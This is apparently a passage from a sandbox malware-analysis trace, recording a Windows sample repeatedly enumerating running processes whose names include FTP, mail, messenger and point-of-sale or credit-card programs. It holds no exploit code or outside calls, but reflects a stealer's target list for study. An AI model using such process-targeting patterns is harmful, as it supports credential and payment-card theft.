lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0100.678] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0100.678] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0100.679] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0100.679] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0100.679] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0100.680] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0100.681] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0100.681] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0100.682] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0100.683] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0100.684] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0100.684] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0100.685] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0100.686] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0100.687] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0100.687] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0100.688] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0100.689] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0100.690] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0100.690] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0100.700] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0100.700] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0100.701] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0100.702] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0100.702] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0100.703] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0100.704] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0100.704] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0100.705] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0100.706] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0100.706] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0100.707] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0100.708] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0100.708] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0100.709] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0100.710] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="numerous-worm-coding.exe")) returned 1 [0100.710] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0100.711] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="anadecadessrc.exe")) returned 1 [0100.712] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0100.712] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0100.713] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.714] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0100.714] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.715] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0100.715] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0100.716] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.716] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0100.717] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.717] Process32NextW (in: hSnapshot=0xec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xeb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0100.718] Sleep (dwMilliseconds=0x64) [0100.873] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xf0 [0100.877] Process32FirstW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.878] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0100.878] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0100.879] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.879] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0100.880] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.880] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0100.881] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0100.881] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0100.882] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0100.882] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.883] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.883] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.884] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.884] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.885] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0100.885] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.885] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.886] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0100.888] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0100.888] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0100.889] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.889] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.890] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0100.890] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x580, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x364, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0100.891] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0100.891] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="chelsea.exe")) returned 1 [0100.891] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="temperature_lowest.exe")) returned 1 [0100.892] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="holmes rejected dividend.exe")) returned 1 [0100.892] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="enters.exe")) returned 1 [0100.893] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="championshipsmpegs.exe")) returned 1 [0100.893] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="alfred_both.exe")) returned 1 [0100.894] Process32NextW (in: hSnapshot=0xf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="facilitatebranchesanymore.exe")) returned 1 [0100.894] 